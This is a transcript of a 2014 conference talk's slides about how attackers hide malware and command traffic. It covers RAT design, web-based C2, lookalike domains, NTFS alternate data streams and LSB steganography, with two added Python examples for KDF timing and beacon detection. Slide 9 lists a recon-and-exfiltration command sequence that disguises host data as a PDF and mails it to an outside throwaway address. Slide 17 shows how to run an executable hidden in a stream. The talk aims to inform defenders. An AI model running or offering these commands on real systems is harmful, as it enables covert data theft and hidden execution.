CodeStock14: Hiding in Plain Sight

  1. Hiding in Plain Sight
     Presented by Rob Gillen / @argodev
     This work is licensed under a Creative Commons Attribution 4.0 International License.
     This talk and related resources are available online: https://github.com/argodev/talks/
  2. Disclaimer
     The content of this presentation represents my personal views and thoughts at the present time. I reserve the right to change my views and opinions at any time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
  3. HTDCS: Helpdesk Ticket Driven Cyber Security
  4. Overview
     RAT Design
     Encryption
     Command/Control (C2)
     AntiVirus
     Behavior
  5. RAT Design
     Exe is dropped via infected page
     Queries web page for commands
     Performs commands if not done previously
     Periodically polls for new commands
  6. Encryption
     Complex encryption is trivial
     PBKDF: scrypt, a sequential memory-hard function
     Many iterations (>10K)
     Long key lengths
  7. Encryption Example
     Above configuration is custom-hardware resistant
     Takes approximately 1/4 second per guess
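The "1/4 second per guess" figure is the practical meaning of a memory-hard KDF: every password guess, whether by the legitimate holder or by someone brute-forcing a captured blob, costs the same amount of CPU time and RAM. The slide's own scrypt configuration is not reproduced on this page, so the following added example (not the deck's code) uses assumed parameters small enough to run in well under a second, and measures the resulting cost per guess on the local machine:

```python
"""Measure the cost per guess of a memory-hard KDF (scrypt).

Added example; the deck's own configuration is not reproduced on this page,
so the parameters below are assumptions (chosen small enough to run quickly).
Raising n multiplies both the time and the memory needed per guess.
"""
import hashlib
import time

# Memory per derivation is 128 * r * n bytes: 16 MiB with these values.
SCRYPT_PARAMS = {"n": 2 ** 14, "r": 8, "p": 1}


def derive_key(password: bytes, salt: bytes, dklen: int = 32) -> bytes:
    """Derive a fixed-length key; the same password and salt always give the same key."""
    return hashlib.scrypt(password, salt=salt, dklen=dklen, **SCRYPT_PARAMS)


def seconds_per_guess(password: bytes, salt: bytes, rounds: int = 3) -> float:
    """Average wall-clock time of one derivation, i.e. the cost of a single
    password guess on this hardware with these parameters."""
    start = time.perf_counter()
    for _ in range(rounds):
        derive_key(password, salt)
    return (time.perf_counter() - start) / rounds


if __name__ == "__main__":
    salt = b"constructed-salt"  # constructed 16-byte sample salt
    key = derive_key(b"correct horse battery staple", salt)
    print("derived key:", key.hex())
    print("seconds per guess: %.3f" % seconds_per_guess(b"any guess", salt))
```

To approach the slide's quarter-second figure, increase `n` (each doubling roughly doubles time and memory) rather than `p`, since `p` adds parallelisable work that custom hardware handles cheaply.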
  8. Command/Control
     Use Web2C approach
     Commands are "issued" en masse via normal, benign-looking web pages
     Common ports
     Leverages existing HTML/server constructs
  9. Command Text
     ipconfig /all > %APPDATA%info.txt
     net start >> %APPDATA%info.txt
     tasklist /v >> %APPDATA%info.txt
     net user >> %APPDATA%info.txt
     net localgroup administrators >> %APPDATA%info.txt
     netstat -ano >> %APPDATA%info.txt
     net use >> %APPDATA%info.txt
     copy %APPDATA%info.txt %APPDATA%output.pdf
     del %APPDATA%info.txt
     sendmail %APPDATA%output.pdf Status Update "Jones, William E. wejones@yourorg.gov" itebaffe-836@yopmail.com smtp.yourorg.gov
     del %APPDATA%output.pdf
  10. Mimic User Behavior: Traffic Rates
     Monitor incoming/outgoing network traffic for X days
     Configure exfil to stay within X% of "normal"
     C2: exponential/randomized stand-down
     Only communicate during periods of activity
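The "randomized stand-down" point is worth seeing from the monitoring side. A naive poller that checks in at a fixed interval stands out in proxy logs as a flow whose inter-request gaps have almost no variance; once the interval is jittered, that statistic alone no longer separates it from ordinary browsing. The following added example (not the deck's code) runs that check over a constructed proxy log in an assumed `<epoch_seconds> <src_ip> <dest_host>` format:

```python
"""Detect fixed-interval ("beaconing") outbound connections in a proxy log.

Added example, not code from the deck.  The log format is an assumption:
one line per request, "<epoch_seconds> <src_ip> <dest_host>".  All sample
lines below are constructed for this example.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 contacts one host exactly every 300 s (a naive
# poller), 10.0.0.7 contacts another with randomised gaps (the deck's
# "exponential/randomized stand-down"), and 10.0.0.9 makes too few requests
# to judge either way.
SAMPLE_LOG = "\n".join(
    [f"{1000 + 300 * i} 10.0.0.5 updates.example-cdn.net" for i in range(8)]
    + [
        "1000 10.0.0.7 news.example.org",
        "1120 10.0.0.7 news.example.org",
        "1730 10.0.0.7 news.example.org",
        "1775 10.0.0.7 news.example.org",
        "2755 10.0.0.7 news.example.org",
        "3055 10.0.0.7 news.example.org",
        "3130 10.0.0.7 news.example.org",
        "3530 10.0.0.7 news.example.org",
        "1000 10.0.0.9 mail.example.com",
        "1300 10.0.0.9 mail.example.com",
        "1600 10.0.0.9 mail.example.com",
    ]
)


def parse_log(text):
    """Group request timestamps by (src, dest), each list sorted ascending."""
    flows = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, src, dest = line.split()
        flows[(src, dest)].append(int(ts))
    return {key: sorted(times) for key, times in flows.items()}


def interval_stats(times):
    """Mean gap between consecutive requests and its coefficient of variation
    (population std-dev / mean).  A CV near 0 means a near-constant period."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    if not gaps:
        return None
    mean_gap = mean(gaps)
    if mean_gap == 0:
        return None
    return mean_gap, pstdev(gaps) / mean_gap


def find_beacons(text, min_events=6, max_cv=0.2):
    """Return (src, dest, count, mean_gap, cv) for flows whose timing looks periodic."""
    hits = []
    for (src, dest), times in parse_log(text).items():
        if len(times) < min_events:
            continue
        stats = interval_stats(times)
        if stats is None:
            continue
        mean_gap, cv = stats
        if cv <= max_cv:
            hits.append((src, dest, len(times), mean_gap, cv))
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print("possible beacon: %s -> %s, %d requests, mean gap %.0fs, CV %.2f" % hit)
```

Only the fixed-interval flow is reported; the jittered one has a CV well above the threshold. That is exactly the slide's point, and the reason the closing "Behavior must play a role" slide matters: periodicity has to be combined with other signals (destination rarity across the fleet, activity outside the user's working hours, volume relative to the host's baseline) rather than used alone.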
  11. Mimic User Behavior: Target URLs
     Monitor outgoing web queries/URLs for X days
     Use similar domain names for malicious traffic
     Append similar/same query strings to malicious requests
  12. Hiding in Logs
     v-client-5b.sjc.dropbox.com
     snt-re3-9a.sjc.dropbox.com
     yn-in-f125.1e100.net
     l1.ycs.vip.dcb.yahoo.com
     snt-re3-9a.sjc.drpbox.com
     ip-69-31-29-228.nlayer.net
     a23-47-20-211.deploy.static.akamaitechnologies.com
     l3.ycs.vip.dcb.yahoo.com
     ir2.fp.vip.bf1.yahoo.com
     www.nbcnews.com.edgesuite.net
     wac.946A.edgecastcdn.net
     a2.twimg.com
  13. Other Hiding Techniques
     Office file content embedding
     Creative location
     Alternate Data Streams
     Least Significant Bit
     Network protocol manipulation
  14. Creative File Locations
  15. Alternate Data Streams
     Feature of NTFS since NT 3.5.1
     Used for metadata and compatibility with other file systems
  16. So What?
     # notepad pcast-nitrd-report-2010.pdf:secret.txt
  17. What about this?
     # type evil.exe > notepad.exe:evil.exe
     # start notepad.exe:evil.exe
  18. Crude Image Stego: LSB
     Least Significant Bit: alter it and encode the message across the LSB of successive bytes
     Visually imperceptible
     Computationally challenging to detect
     Encryption also an option
  19. LSB: How It Works
  20. Carrier Image
     Image data: Size: 2.1 MB; Dimensions: 3500x2343 px; Resolution: 300 dpi; Bit depth: 24; ~8 megapixel
     "Secret" message: Welcome! Remember, things aren't always what they seem.
  21. LSB Blow Up
  22. Network Protocol Abuse
  23. Challenges of Signature-Based Tools
  24. Next Steps
     Know what you can and can't see
     Consider implications of your monitoring strategy
     Behavior *must* play a role
  25. Questions/Contact
     Rob Gillen
     rob@gillenfamily.net
     http://rob.gillenfamily.net
     @argodev
     This talk and related resources are available online: https://github.com/argodev/talks/
